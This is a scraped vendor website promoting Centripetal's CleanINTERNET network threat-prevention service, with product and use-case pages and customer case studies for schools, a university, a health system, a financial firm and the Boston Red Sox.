# centripetal ## Home ### [Real-time Threat Prevention](https://www.centripetal.ai/) You don’t need more detection. You need real-time prevention.
CleanINTERNET® stops every known threat before they reach your network. Deployed between your ISP and your firewall, it blocks attacks at the source.No alerts. Just silent, always-on protection— preventing threats at wire speed and scale. Trusted Where Failure Isn’t An Option Centripetal protects organizations operating in complex, high-risk environments—where downtime, exposure, and missed threats carry real consequences. See Prevention In The Real World See how organizations reduce exposure, limit downstream noise, and stop known threats before they reach the network. See how CleanINTERNET®—the 24/7 proactive threat prevention solution—can protect your business, your customers, and your reputation. --- ## Pages ### [CleanINTERNET® Solutions](https://www.centripetal.ai/solutions) Published: 2025-07-16 CleanINTERNET is proactive threat prevention service that is always watching, always working. Leveraging the most comprehensive threat intel, AI-accelerated processing and policy enforcement, and human ingenuity,  CleanINTERNET cuts alert fatigue, reduces SIEM load, simplifies your stack, and gives your team back control. Turning Features Into Real-World ProtectionEvery day, billions of malicious threats move across the internet, looking for a way in. Most pass right by, but some are aimed directly at you. This is where speed, scale, and skill converge—analyzing each packet, making the call in an instant, and stopping the threat before it ever touches your network. Here’s how real-time threats are stopped in real time.  The big leagues. Relentless noise. Persistent adversaries. There’s a lot we have in common with the Boston Red Sox, learn more about how our winning team guards their winning team from cyberthreats. See how CleanINTERNET®—the 24/7 proactive threat prevention solution—can protect your business, your customers, and your reputation. --- ### [CleanINTERNET® Enterprise](https://www.centripetal.ai/solutions/enterprise) Published: 2025-07-16 Stop Defending Business As UsualTake a bold new approach to security—and get uncommon results. CleanINTERNET® Enterprise challenges the status quo with intelligent, proactive security at a scale, speed, and service level you never expected. The financial services industry is a prime target for cyberattacks, ranking as the second most attacked sector, according to Statista. This is largely due to the valuable data these institutions collect, including consumer payment card information, financial account details, and other sensitive data. As a result, data breaches are a significant concern. The FBI reports that phishing is the most common type of cyberattack against financial services firms.  See how CleanINTERNET®—the 24/7 proactive threat prevention solution—can protect your business, your customers, and your reputation. --- ### [CleanINTERNET® Cloud](https://www.centripetal.ai/solutions/cloud) Published: 2025-07-16 Intelligence-Powered Threat Protection for Your Cloud InfrastructureCleanINTERNET for Cloud brings our powerful, intelligence-driven network defense to AWS and Azure environments—delivering proactive protection at cloud scale. It shields your applications, data, and workloads using real-time threat intelligence, automated enforcement, and zero-latency traffic inspection. See how CleanINTERNET—the 24/7 proactive threat prevention solution—can protect your business, your customers, and your reputation. --- ### [CleanINTERNET® Fusion](https://www.centripetal.ai/solutions/fusion) Published: 2025-07-16 Join Forces For GoodCombine the data you have with the intelligence adversaries don’t. By integrating your SOC alerts, TIP feeds, and other data with 10 billion+ IOCs, CleanINTERNET® Fusion bridges the gap between what’s known and what’s seen. See how CleanINTERNET®—the 24/7 proactive threat prevention solution—can protect your business, your customers, and your reputation.  --- ### [CleanINTERNET® DNS](https://www.centripetal.ai/solutions/dns) Published: 2025-07-23 The Internet:
Now Re-open For BusinessTake back the freedom to work and connect 
securely online. CleanINTERNET® DNS applies global threat intelligence and AI-accelerated analytics to every DNS request in real-time—stopping threats before a connection is ever made. The financial services industry is a prime target for cyberattacks, ranking as the second most attacked sector, according to Statista. This is largely due to the valuable data these institutions collect, including consumer payment card information, financial account details, and other sensitive data. As a result, data breaches are a significant concern. The FBI reports that phishing is the most common type of cyberattack against financial services firms.  See how CleanINTERNET®—the 24/7 proactive threat prevention solution—can protect your business, your customers, and your reputation.  --- ### [CleanINTERNET® DNS on Google Cloud](https://www.centripetal.ai/solutions/google-cloud) Published: 2025-07-23 The Internet:
Now Re-open For BusinessTake back the freedom to work and connect 
securely online. CleanINTERNET® DNS on Google Cloud applies global threat intelligence and AI-accelerated analytics to every DNS request in real-time—stopping threats before a connection is ever made. See how CleanINTERNET®—the 24/7 proactive threat prevention solution—can protect your business, your customers, and your reputation.  --- ### [CleanINTERNET® Access](https://www.centripetal.ai/solutions/access) Published: 2025-07-23 Protect EverywhereProactively protect everyone, working anywhere,  all the time. CleanINTERNET Access extends always-working, always-watching threat prevention to your mobile workforce—wherever they’re working. See how CleanINTERNET®—the 24/7 proactive threat prevention solution—can protect your business, your customers, and your reputation.  --- ### [SOC Transformation](https://www.centripetal.ai/use-cases/soc-transformation) Published: 2025-07-23 Use CaseTransforming Security OperationsSecurity operations teams face seemingly impossible challenges. Between alert overload, redundant tools, and the growing skills gap, even well-resourced SOCs struggle to keep up. CleanINTERNET® offers the answer—shifting security from reactive response to proactive threat prevention. By automatically blocking known threats at the network edge, drastically reducing SIEM noise, and augmenting in-house teams with expert analysts, CleanINTERNET empowers organizations to streamline operations, cut costs, and focus on what really matters.  The Centripetal Difference See how CleanINTERNET®—the 24/7 proactive threat prevention solution—can protect your business, your customers, and your reputation. --- ### [Cost Reduction](https://www.centripetal.ai/use-cases/cost-reduction) Published: 2025-07-23 Use CaseReduce Cybersecurity CostsCybersecurity spending is rising, but outcomes aren’t. Bloated toolsets, overlapping services, and overwhelming alert noise can leave security leaders with little to show for their efforts and investments. CleanINTERNET® changes that equation—helping organizations minimize complexity and dramatically reduce costs. By cutting SIEM and MSSP spend, deferring firewall upgrades, or consolidating threat intelligence feeds, enterprises can see measurable ROI—and better protection—often within months. The Centripetal Difference See how CleanINTERNET®—the 24/7 proactive threat prevention solution—can protect your business, your customers, and your reputation. --- ### [Shrink The Attack Surface](https://www.centripetal.ai/use-cases/shrink-attack-surface) Published: 2025-07-23 Use CaseShrink The Attack SurfaceIn the hyper-connected, cloud-enabled, and mobile-first world of business, attack surfaces are expanding faster than traditional security controls can contain them. CleanINTERNET® confronts this complexity head-on—enforcing real-time threat intelligence at the edge, across endpoints, and into the cloud. By proactively blocking known threats before they ever reach the network, CleanINTERNET eliminates blind spots and hardens the perimeter. The result: true attack surface reduction—powered by global threat intelligence, accelerated by AI, and continuously optimized by expert analysts. The Centripetal Difference See how CleanINTERNET®—the 24/7 proactive threat prevention solution—can protect your business, your customers, and your reputation. --- ### [Compliance](https://www.centripetal.ai/use-cases/compliance) Published: 2025-07-23 Use CaseComplianceAs digital operations expand, organizations must handle increasing volumes of sensitive data. Auditors and regulators demand proof of security controls aligned with numerous safeguards, requirements, mandates, and laws. CleanINTERNET® offers relief—transforming fragmented security controls into a continuous compliance engine. By blocking threats before they reach the network, streamlining the security stack, and eliminating noise from operations, CleanINTERNET enables better compliance—and delivers proactive protection.  The Centripetal Difference See how CleanINTERNET®—the 24/7 proactive threat prevention solution—can protect your business, your customers, and your reputation. --- ### [SIEM Alternative](https://www.centripetal.ai/use-cases/siem-alternative) Published: 2025-07-23 Use CaseSIEM AlternativeTraditional SIEMs have become both essential and untenable. While they promise visibility, they often deliver high costs, excessive maintenance, and overwhelming noise that can offset any gains. CleanINTERNET® upsets the SIEM paradox—preventing threats before they need to be logged. Acting as a powerful upstream filter, CleanINTERNET drastically reduces event ingestion, eliminates false positives, and delivers contextual, audit-ready threat visibility through a dedicated portal. It means lean security teams can shift their attention from logging to intelligence—and from response to prevention.  The Centripetal Difference See how CleanINTERNET®—the 24/7 proactive threat prevention solution—can protect your business, your customers, and your reputation. --- ### [Customer Stories](https://www.centripetal.ai/customer-stories) Published: 2025-07-16 As public institutions expand and adopt advanced technologies, visibility and confidence become essential. This college strengthened its cybersecurity foundation to support innovation across more than 20 community locations—without disrupting academic operations or mission. One deployment. Dozens of districts protected. Inline prevention stopped billions of threats each year, reduced firewall strain, and delivered a scalable model for defending underserved education networks—without adding operational complexity. Like most institutions of higher education, this Research University struggles to maintain the upper hand when it comes to protecting its students and faculty from the relentless tide of cybersecurity threats. The financial services industry is a prime target for cyberattacks, ranking as the second most attacked sector, according to Statista. This is largely due to the valuable data these institutions collect, including consumer payment card information, financial account details, and other sensitive data. As a result, data breaches are a significant concern. The FBI reports that phishing is the most common type of cyberattack against financial services firms.  The big leagues. Relentless noise. Persistent adversaries. There’s a lot we have in common with the Boston Red Sox, learn more about our daily series of wins guarding this storied franchise from cyberthreats. For large research hospitals, it’s challenging to empower people to continue to carry out their research, duties and care, while simultaneously providing secure access to the tools and processes they need without compromising networks, data, and devices. See how CleanINTERNET®—the 24/7 proactive threat prevention solution—can protect your business, your customers, and your reputation.  --- ### [Protecting Educational Communities: A Regional Cybersecurity Approach](https://www.centripetal.ai/customer-stories/protecting-educational-communities-a-regional-cybersecurity-approach) Published: 2025-07-22 Summary: Learn how a state-funded RSOC protected dozens of school districts by deploying centralized, inline cybersecurity—blocking billions of threats annually while reducing infrastructure strain. Protecting Educational Communities: A Regional Cybersecurity ApproachDeploy protection at a single point to defend dozens of downstream organizations A state-funded Regional Security Operations Center (RSOC) partnered with Centripetal to protect dozens of school districts across a wide geographic area. By deploying CleanINTERNET® Enterprise in centralized locations, the program achieved large-scale threat prevention while reducing infrastructure load and operational complexity for underserved communities.The ChallengeIn 2019, a coordinated ransomware attack struck nearly two dozen municipalities simultaneously, overwhelming the state’s limited cybersecurity resources. With only three incident responders statewide, critical systems—including 911 dispatch and utility billing—were encrypted, exposing the vulnerability of smaller communities without dedicated security teams.The incident led to the state’s first declared cybersecurity disaster and forced leadership to rethink how to provide scalable protection to underserved organizations.A New Operating ModelIn response, the state established Regional Security Operations Centers (RSOCs) hosted at universities. Universities were selected for their built-in talent pipelines, technical ecosystems, and regional presence. Funded through state appropriations, RSOCs provide cybersecurity services at no cost to participating organizations. The program has since expanded to three regional centers, with additional growth planned.The Solution: CleanINTERNET® EnterpriseOne-to-Many ProtectionThe organization recognized a unique architectural advantage: many school districts receive Internet connectivity through education service centers over dedicated fiber, with all traffic converging at a regional hub. This made it possible to deploy CleanINTERNET at a single point and protect every downstream district.A proof-of-value deployment quickly demonstrated impact. The security director observed a sharp drop in firewall CPU and memory utilization as CleanINTERNET blocked threats before they reached existing infrastructure. As he summarized, “It was a win-win.”From Pilot to ProgramAfter approximately a year of consistent results, the initial deployment became the template for expansion. Additional RSOCs began planning deployments using the same centralized architecture.ArchitectureCentralized Protection PointsStrategic placement: CleanINTERNET appliance is deployed inline, outside the firewallOne-to-many model: A single device protects 30+ school districtsFail-open design: Inline deployment with automatic failover ensures uninterrupted connectivityLayered defense: Regional prevention complements endpoint security at individual districtsOperationsThe RSOC operates as a Security Operations Center–as–a–Service, staffed by full-time analysts and university students. The student analyst program provides hands-on experience while supporting daily operations and developing future cybersecurity talent. They are supported by dedicated Threat Intelligence Operations analysts at Centripetal, who monitor operations, threat hunt, and provide health reports and metrics.ResultsQuantified Impact2+ billion threats blocked annually at a single education service center before reaching the firewallInfrastructure BenefitsReduced firewall load: CPU and memory utilization dropped sharply after deploymentImproved efficiency: Threats eliminated before consuming firewall resourcesSimplified deployment: No complex VLANs or mirror ports requiredReal-World ValidationIn 2024, a school district in the state experienced a ransomware incident traced to a secondary Internet connection that bypassed the protected path. Systems connected through the Centripetal-protected route remained uncompromised. As the security director noted, “The one time we got hit, it was not through Centripetal.”Key Success FactorsUnique Placement StrategyInline, outside-the-firewall deployment blocked threats before they consumed downstream resources.Multi-Source Threat IntelligenceAggregated intelligence from multiple premium sources delivered broader coverage than firewall-native or single-feed solutions.Minimal Operational OverheadUnlike alert-heavy tools, RuleGate operated quietly and effectively, reducing analyst fatigue and allowing staff to focus on higher-value investigations.Scale Through CentralizationProtecting at the ISP level enabled coverage for dozens of organizations with minimal hardware and staffing—especially valuable for rural districts with limited IT resources.Expansion PlansThe program is expanding to additional education service centers using the same centralized model. Future initiatives include:Multi-tenant reporting for centralized visibilityDNS-layer threat protectionExtending the model to other RSOC-served organizations beyond educationIndustry ImplicationsThis deployment provides a scalable blueprint for protecting educational institutions and underserved communities:Leverage existing regional infrastructureCentralize prevention for one-to-many efficiencyPartner with universities for talent and operationsEmphasize inline prevention over detection-only modelsConclusionBy combining state funding, university partnerships, and centralized deployment of Centripetal CleanINTERNET, this program delivers scalable, cost-effective cybersecurity protection to dozens of school districts. The one-to-many architecture enables a level of prevention that would be impractical for individual organizations and now serves as the standard model for the region’s ongoing expansion. --- ### [Securing Innovation in a Distributed Higher Education Environment](https://www.centripetal.ai/customer-stories/distributed-higher-ed-environment) Published: 2025-07-22 Summary: Learn how a public higher education institution strengthened its cybersecurity foundation to support innovation across a distributed campus—without disrupting academic operations or mission. Securing Innovation in a Distributed Higher Education EnvironmentA higher education institution with more than 20 community locations was entering a period of transformation. They had clear ambitions to lead in artificial intelligence and advanced technologies, but quickly identified a more fundamental issue: the institution’s cybersecurity foundation needed strengthening before innovation could safely accelerate. The team recognized common risks—limited visibility into network traffic, rising cyber threats, and overburdened security tools—all within the unique constraints of academia, where academic freedom, legacy systems, and complex governance complicate security decisions.The institution faced several core challenges:Limited insight into unknown or unseen threats on the networkSecurity controls generating noise without clarity, making prioritization difficultHigh stakes for leadership: “Don’t end up in the news for a breach”The need to align cybersecurity investments with student success and institutional mission, not just technical metricsA requirement to move quickly without disrupting existing architecture or operationsThe institution needed a solution that could demonstrate value fast, withstand deep technical scrutiny, and support long-term strategic planning.The Approach: Proof of Value Over PromisesThe organization engaged with Centripetal to conduct a Proof of Value (POV) of its CleanINTERNET® service. Stakeholders said what stood out was not just the technology, but the engagement model:Direct, technical conversations early in the processWillingness to address skepticism around bold claims head-onImmediate follow-up and rapid scheduling of a live demonstrationA structured Proof of Value rather than a generic proof of conceptWithin days, Centripetal deployed appliances without major architectural disruption, allowing the institution to safely evaluate the solution in a real-world environment.The POV emphasized outcomes, not just features:What threats were actually present on the networkHow much malicious traffic could be eliminatedWhat operational burden could be reduced on existing firewallsHow insights could inform future cybersecurity and IT decisionsWeekly briefings translated technical findings into clear, executive-ready insights, ensuring alignment across technical staff, leadership, and procurement stakeholders.The Results: Rapid Impact, Measurable ConfidenceWithin the first days of the Proof of Value, results were unmistakable:99% reduction in attempted zero day executions99% shielding of hostile reconnaissance from compromised infrastructure directed by threat actors preventing intrusion, brute force, and exploit attempts at your perimeter.Dramatic reductions in malicious and unnecessary network trafficImmediate relief to existing security infrastructureClear visibility into previously unknown threat activityFaster consensus among technical skeptics through real data, not claimsBeyond security metrics, the benefits extended into operations and governance:Leadership gained confidence through firsthand visibility, not secondhand explanationsProcurement risks were reduced by leveraging existing vendor relationshipsDecision-making accelerated, compressing a process that typically takes months into weeksThe solution aligned cleanly with institutional priorities, including student success, system reliability, and reputational protectionThe college moved from initial contact to contract in under 60 days—an unusually fast timeline for higher education—supported by strong collaboration, responsiveness, and shared urgency.Ongoing ValuePost-deployment, the institution continues to benefit from:Ongoing threat intelligence delivered in plain-language executive briefingsImproved ability to balance security with academic freedomA quieter, more intelligible network environment that supports future innovationA stronger foundation for a defense-in-depth cybersecurity strategyWhat began as a search for visibility into “what we don’t know about our network” became a cornerstone of the college’s broader cybersecurity and technology roadmap.ConclusionWith the right combination of credible solution, responsive vendor team, and aligned incentives, even complex enterprise security deployments can move rapidly in academic environments. The institution successfully addressed its immediate cybersecurity concerns while maintaining the openness required for academic freedom, all within an aggressive timeline that set institutional records. --- ### [Higher Education](https://www.centripetal.ai/customer-stories/higher-education) Published: 2025-07-22 How a Research University Uses Intelligence to Eliminate ThreatsLike most institutions of higher education, this Research University struggles to maintain the upper hand when it comes to protecting its students and faculty from the relentless tide of cybersecurity threats. As a major research university, its labs and libraries are filled with enormous volumes of proprietary scientific data. That, along with over 60 years of sensitive personal information collected on current students and alumni, makes the university a regular target for ransomware and other crippling cyberattacks.According to a recent survey, 44% of universities surveyed last year were victims of a ransomware attack, which puts them at the top of the list along with the retail industry. As more students and faculty moved last year to a hybrid learning model, the university’s overburdened IT staff needed more help than ever finding a way to ensure the environment was adequately protected.SolutionThe university was intrigued by the novel solution Centripetal proposed with the CleanINTERNET® managed security service. With the ability to apply actionable intelligence from 80 different threat intelligence partners and 3,500 threat feeds, CleanINTERNET® held the promise of shielding the university’s networks from virtually all known bad traffic before ever entering the network.The  team also found the threat analysts that came with the CleanINTERNET service to be very appealing, as well. This would provide a dedicated SecOps team that would act as an extension to the university’s overburdened security and networking staff. As such, they would be on hand to help identify and help mitigate evolving threats and patterns that are unique to the university’s environment and higher education profile. The next step was to schedule a quick trial.“They’ve given us much better visibility into what the threat landscape looks like in our environment. It allows us to focus on threats we can mitigate before they become a real problem.”CIO and Dean of LibrariesResearch UniversityResultsThe IT team leading the university’s evaluation of the CleanINTERNET® service was very surprised and delighted with the results. Not only were they astonished by how well the threat shielding worked, but they were equally impressed that there was no impact to network performance typically seen with traditional security gateways. Over the trial period, CleanINTERNET® identified and shielded the university from about 95% of all known bad traffic before it was able to make its way into the network.Today, CleanINTERNET® shields the university from over 7 million threats every day, on average, which has also resulted in a net gain in network performance. The ability to automatically analyze and shield all suspicious inbound and outbound traffic across the organization in-real time went beyond the university’s expectations. The CIO went on to say, “When we saw the first report, we were shocked as to how much suspicious activity was going on and how many breach attempts there were. We would have already suffered some real attacks, which would have cost us dearly”. The CleanINTERNET® service also significantly reduced the workload on the university’s downstream security tools, like their firewalls and security gateways, which allowed them to focus more attention on stopping other priorities that were getting ignored.Meeting regularly with the CleanINTERNET® threat analysts provided another layer of value that differentiated the Centripetal solution. Technology alone is rarely enough to thwart evolving and zero-day attacks that often elude traditional security solutions. The CleanINTERNET® team worked closely with the University’s IT team to get a clear understanding of the volume, variety, and source of threats pounding at the university’s networks. “CleanINTERNET® gives us threat hunting expertise without hiring another staff member”, the CIO gushed. “It provides seasoned security experts who are watching over us and training us to understand what’s going on on our network and to head off disasters. We’ve become their fans.”  --- ### [University Health System](https://www.centripetal.ai/customer-stories/health-system) Published: 2025-07-22 University Health System Shields Against Threats With Preventative Cyber CareFor large research hospitals, it’s challenging to empower people to continue to carry out their research, duties and care, while simultaneously providing secure access to the tools and processes they need without compromising networks, data, and devices. University Hospital Systems depend more and more on technology as they further build their infrastructure upon it. Thus, divisions of patient care, research, billing and more, within a delicate hospital ecosystem are further exposed to external threats and cyber attacks. This puts at risk not just data and network security, but the lives of patients themselves.With more than 10,000 employees and more than 1.5 million outpatient visits annually, this health system has a lot to protect. Like other large legacy institutions exposing a large address space in Border Gateway Protocol (BGP), the health system was consistently seeing 3M events on their firewall every hour, and upwards of 63M events total, every day.SolutionThe university health system worked with Centripetal to methodically implement a proactive solution, CleanINTERNET®. The solution, a comprehensive service, proactively shields their network and enables a diverse environment of doctors, patients, researchers, staff and medical equipment to simultaneously receive a high level of protection and still work effectively.“I did some spot checking on the firewall logs before Centripetal, 60 million before [the] appliance was implemented, down to 500,000 the other day.”SENIOR CYBERSECURITY ARCHITECTNORTHEASTERN UNIVERSITY HEALTH SYSTEMResultsOn the first full day of shielding in a process sequence to achieve an optimal state, only 402,000 blocks were seen the entire day. Then, after an additional round of feeds were added only 213,000 blocks were seen in an entire day.The health system measures outside-in blocks recorded by their firewall to the SIEM which is important because traditionally the SIEM is expensive to store. With a typical firewall block message size of 2KB, they went from storing 5.7 GB per hour, to 11.7MB per hour – significantly lowering their costs.After two months and only a few rounds of shielding of high confidence threats, there were zero reports of disruptions to the network related to the implementation of the CleanINTERNET® service.“We’ve gone from 3M blocks an hour, to 20,000 an hour, to 6,000 an hour. What we will now record in SIEM for Outside-In blocks over three weeks is what we used to record to SIEM in one hour.”SENIOR CYBERSECURITY ARCHITECTNORTHEASTERN UNIVERSITY HEALTH SYSTEM --- ### [Intelligence Powered Cybersecurity for Financial Services](https://www.centripetal.ai/customer-stories/financial-services) Published: 2025-07-22 Financial Services Organization Operationalized Relevant Threat Intelligence in Real TimeIn 2022, 74% of financial institutions experienced one or more ransomware attacks, and 63% of those institutions paid the ransom. This financial services firm is a constant target of adversarial groups. Given that they play a key role in the global economy, the organization places a strong emphasis on ensuring their enterprise is protected and that their data is safe. The firm was aware that they faced a high risk of cyber attacks and wanted to ensure both the privacy of their customers’ records and integrity of their networks.With data centers spread across the United States, it had become impossible for the firm to manage attacks on their infrastructure. They not only needed situational awareness of specific threats to their company, but also a way to correct the high noise-to-signal ratio from misleading and inaccurate sources of threat intelligence monopolizing the security team’s time.The organization’s security team required a solution that allowed operationalizing relevant threat intelligence in real-time, including:Fully correlated cyber threat intelligence data continuously updated in near real-timeThe ability to automatically filter out noise and false positives against billions of indicators of compromise (IOCs)Comprehensive data and analytics to build an enhanced security information and event management (SIEM) threat dashboardSolutionThe financial services company worked with Centripetal to manage the sources and types of threat intelligence used to defend their network. Doing so allowed the security team to focus on delivering rapid incident response and real-time visibility into the threat landscape of all their datacenter locations.The Centripetal solution provided sophisticated packet filtering combined with real-time threat intelligence feeds and analytics capabilities. This meant large dynamic policies, with millions of rules enabled, containing high fidelity indicators to actively protect the network in real-time without degradation to network performance or user experience. With these capabilities in place, analysts could detect threats that had previously gone unnoticed.Leveraging criticality ratings, confidence, tags, and deep contextual associations to define granular policies for alerting and blocking, the firm was able to operationalize threat intelligence and deliver immediate enforcement of dynamic threat indicators.With real-time feedback now available to the Security Operations Center team, they could conduct network research; IOCs could be identified and attributed to activity on known internal network hosts in multiple locations. With this real-time information and insights, Incident response teams were able to target their efforts on the most severe and urgent security incidents.ResultsThe solution the Centripetal team deployed provided the firm with fully correlated inbound and outbound data. This allowed the organization to spot previously undetected outbound network threats with a level of visibility and control that they did not have previously.The financial services firm was also able to identify malicious hosts on their network, and without disruption, block any outbound communications to known bad actors. The solution allowed the security team to react faster to threat data, ultimately regaining control of their network and keeping their data secure. --- ### [Boston Red Sox](https://www.centripetal.ai/customer-stories/boston-red-sox) Published: 2025-07-22 The Future of Cybersecurity:The Red Sox
Are Betting on IntelligenceWith millions of fans, hundreds of major events, and an ever-expanding digital footprint, the Boston Red Sox face a complex cybersecurity challenge. Every system, from ballpark analytics to fan engagement technology, is a potential attack vector.  Every year, millions of people pass through Fenway Park’s gates, not just for baseball, but for concerts, events, and experiences at the iconic venue. But beyond the roar of the crowd, Fenway operates as a fully connected digital ecosystem. Ticketing and payment systems, fan Wi-Fi, surveillance cameras, beacons, and analytics platforms all work together to create a seamless, digital experience. Yet, with every new connection, the attack surface expands—offering cybercriminals more ways to get in. While fans focus on the game, a different kind of defense is at play behind the scenes.“The amount of digital touchpoints in a ballpark has increased exponentially, we didn’t have WiFi when I got here. Now, we have 5G, thousands of television sets, 65 cameras doing baseball analytics, beacons, and all sorts of connected devices that interact with fans.”Ryan Oreste, Director of IT Operations, Boston Red SoxWith every new digital innovation, the Red Sox attack surface expanded—and so did the threats. They faced them continuously, all aimed at their critical networks. The problem wasn’t just the sheer volume of threats, but the reality that traditional cybersecurity tools weren’t built to keep up.Firewalls and endpoint solutions could only react, detecting incidents after they had already breached the network. A reactive approach wasn’t just risky—it was unsustainable. The numbers painted a stark picture of the scale and persistence of these threats over a period of just three weeks:1.8 million+ outbound events to suspicious or malicious domains—many linked to phishing, malware, or fraudulent activity.2.2 million+ inbound scanning attempts probing for vulnerabilities across high-risk ports.Credential leaks in external dumps, providing attackers with a direct pathway in.Malvertising and unwanted ad traffic, increasing risk exposure with zero business value.“Protecting a ballpark, the fans, and our digital assets is a never-ending task,” explains Brian Shield, Senior Vice President and Chief Technology Officer of the Boston Red Sox. “We’re balancing fan experience with cybersecurity at all times.”A ransomware attack could cripple ticketing systems on game day. A compromised camera feed could be manipulated or sold. A data breach could erode the trust of millions. Despite their best efforts, their security strategy remained inherently reactive—because that was all traditional tools allowed for.The question wasn’t if they would be attacked—but how they could shift from reacting to threats to stopping them before they could ever reach their network.A New Era of Defense: A Game-Changing Intelligence Powered SolutionThe Red Sox have always taken a proactive and innovative approach to cybersecurity, staying ahead of the constantly evolving threat landscape as they actively engage with the cybersecurity community, collaborate with Major League Baseball’s cyber initiatives, and adopt emerging technologies. Yet, like every modern enterprise, they face a fundamental challenge: a legacy security model built to react rather than prevent.Adding to the complexity, Fenway Park operates within a complex web of third-party partners—concessions, merchandise, and service providers—all connected to the same ecosystem. “You’re only as good as your weakest link,” says Shield.With real-time feedback now available to the Security Operations Center team, they could conduct network research; IOCs could be identified and attributed to activity on known internal network hosts in multiple locations. With this real-time information and insights, Incident response teams were able to target their efforts on the most severe and urgent security incidents.“We do have to worry about every system that comes online that’s attached to the network,” George says, “and worry about how vulnerable they are, what [the] attack vectors to those systems are.”With every additional technology —from mobile food ordering and ballpark apps to facial recognition for seamless entry—the fan experience improved, and with it their attack surface increased. More access points. More potential vulnerabilities. And, more opportunities for cyber threats to break through.The team needed a solution that could cut through the noise—separating real threats from the overwhelming flood of security events. They needed to stop attacks at the network’s edge before they could escalate. And most importantly, they needed a solution that worked in real-time.When the Red Sox security team first heard about CleanINTERNET®, they were skeptical. The idea of using intelligence to block threats before they reached the network sounded too good to be true.“When I heard there’s this solution that uses intelligence that can protect you before you even exist, I was a little bit skeptical,” Shield shares. “But when we first sat down and had a chance to do a proof of concept, I was shocked at two things in particular. One, the amount of exploits that could be identified in advance. And two, the fact that there was no noticeable impact on our network.”For the first time, the Red Sox had a security tool that didn’t just identify threats—it blocked them before they could ever pose a risk. CleanINTERNET® leveraged real-time intelligence to proactively shield the network, keeping malicious activity from infiltrating their critical systems.The impact was immediate:Over 5 million security events were shielded per day, preventing attacks before they reached the network.More than 150 million threats were blocked each month, dramatically reducing risk exposure.A 99.94% shielding effectiveness, eliminating nearly all high-risk traffic.A 97% decrease in reconnaissance activity, cutting scanning attempts from 1.4 million to just over 36,000.By proactively filtering out threats before they could ever reach the Red Sox network, CleanINTERNET® didn’t just improve security—it transformed operations. It reduced the burden on security operations, increasing their bandwidth so they could focus on more strategic initiatives. And by eliminating unnecessary malicious traffic, the network ran more efficiently.“Just looking at our reports from the last month, we’re shielding about five plus million events a day from our network, that’s over 150 million a month, which is pretty remarkable.”Ryan Oreste, Director of IT Operations, Boston Red SoxCleanINTERNET® wasn’t just another security tool. It was a fundamental shift in how the Red Sox approached cybersecurity. No longer just a necessary cost of doing business, security became an advantage and a proactive force ensuring that the team could focus on what mattered most—both on and off the field.Building Cyber Resilience: The Red Sox PlaybookCybersecurity can no longer be just about responding to threats — today it’s also about breaking free from a reactive cycle and taking control with proactive, intelligence-driven defenses. Every organization faces cyber risk, but no two businesses face it the same way. A major sports venue has different vulnerabilities than a financial institution or a hospital—but attackers don’t care. They exploit weaknesses wherever they find them.“What CleanINTERNET has done for us is just wrap the digital bubble around our entire perimeter environment,” says George. “It’s just a vast ecosystem of threat intel sources that we now have access to.”For years, security teams have been forced into a reactive posture, scrambling to mitigate threats after the fact. But with CleanINTERNET®, that paradigm has shifted.Threats are stopped before they ever reach the network.Security teams no longer drown in alerts—intelligence filters out the noise so they can focus on real risks.Cyber operations are more efficient, allowing the team to take on high-priority initiatives instead of getting stuck in endless incident response.Instead of waiting for attacks to unfold inside their network, threats are being neutralized at the perimeter—before they can become a problem.“Partners like Centripetal are incredibly valuable to us,” Shield said. “We’re reaching a point where just trying to do those things in a reactive manner is no longer good enough.”With intelligence powered cybersecurity in place, the Red Sox have transformed their defense from reactive to resilient.“It’s one of the few proactive efforts that we have in the space that is always evolving,” Shield says. “It puts a huge dent in our threat landscape. And I don’t see us ever going back.” --- ### [The Future of Cybersecurity: The Red Sox Are Betting on Intelligence](https://www.centripetal.ai/customer-stories/the-future-of-cybersecurity-the-red-sox-are-betting-on-intelligence) Published: 2025-08-12 While fans focus on the game, a different kind of defense is at play behind the scenes.  “The amount of digital touchpoints in a ballpark has increased exponentially, we didn’t have WiFi when I got here. Now, we have 5G, thousands of television sets, 65 cameras doing baseball analytics, beacons, and all sorts of connected devices that interact with fans.”Ryan Oreste, Director of IT Operations, Boston Red SoxBoston Red SoxWith every new digital innovation, the Red Sox attack surface expanded—and so did the threats. They faced them continuously, all aimed at their critical networks. The problem wasn’t just the sheer volume of threats, but the reality that traditional cybersecurity tools weren’t built to keep up.Firewalls and endpoint solutions could only react, detecting incidents after they had already breached the network. A reactive approach wasn’t just risky—it was unsustainable. The numbers painted a stark picture of the scale and persistence of these threats over a period of just three weeks:1.8 million+ outbound events to suspicious or malicious domains—many linked to phishing, malware, or fraudulent activity.2.2 million+ inbound scanning attempts probing for vulnerabilities across high-risk ports.Credential leaks in external dumps, providing attackers with a direct pathway in.Malvertising and unwanted ad traffic, increasing risk exposure with zero business value.“Protecting a ballpark, the fans, and our digital assets is a never-ending task,” explains Brian Shield, Senior Vice President and Chief Technology Officer of the Boston Red Sox. “We’re balancing fan experience with cybersecurity at all times.”A ransomware attack could cripple ticketing systems on game day. A compromised camera feed could be manipulated or sold. A data breach could erode the trust of millions. Despite their best efforts, their security strategy remained inherently reactive—because that was all traditional tools allowed for.The question wasn’t if they would be attacked—but how they could shift from reacting to threats to stopping them before they could ever reach their network.A New Era of Defense: A Game-Changing Intelligence Powered SolutionThe Red Sox have always taken a proactive and innovative approach to cybersecurity, staying ahead of the constantly evolving threat landscape as they actively engage with the cybersecurity community, collaborate with Major League Baseball’s cyber initiatives, and adopt emerging technologies. Yet, like every modern enterprise, they face a fundamental challenge: a legacy security model built to react rather than prevent.Adding to the complexity, Fenway Park operates within a complex web of third-party partners—concessions, merchandise, and service providers—all connected to the same ecosystem. “You’re only as good as your weakest link,” says Shield.With real-time feedback now available to the Security Operations Center team, they could conduct network research; IOCs could be identified and attributed to activity on known internal network hosts in multiple locations. With this real-time information and insights, Incident response teams were able to target their efforts on the most severe and urgent security incidents.“We do have to worry about every system that comes online that’s attached to the network,” George says, “and worry about how vulnerable they are, what [the] attack vectors to those systems are.”With every additional technology —from mobile food ordering and ballpark apps to facial recognition for seamless entry—the fan experience improved, and with it their attack surface increased. More access points. More potential vulnerabilities. And, more opportunities for cyber threats to break through.The team needed a solution that could cut through the noise—separating real threats from the overwhelming flood of security events. They needed to stop attacks at the network’s edge before they could escalate. And most importantly, they needed a solution that worked in real-time.When the Red Sox security team first heard about CleanINTERNET®, they were skeptical. The idea of using intelligence to block threats before they reached the network sounded too good to be true.“When I heard there’s this solution that uses intelligence that can protect you before you even exist, I was a little bit skeptical,” Shield shares. “But when we 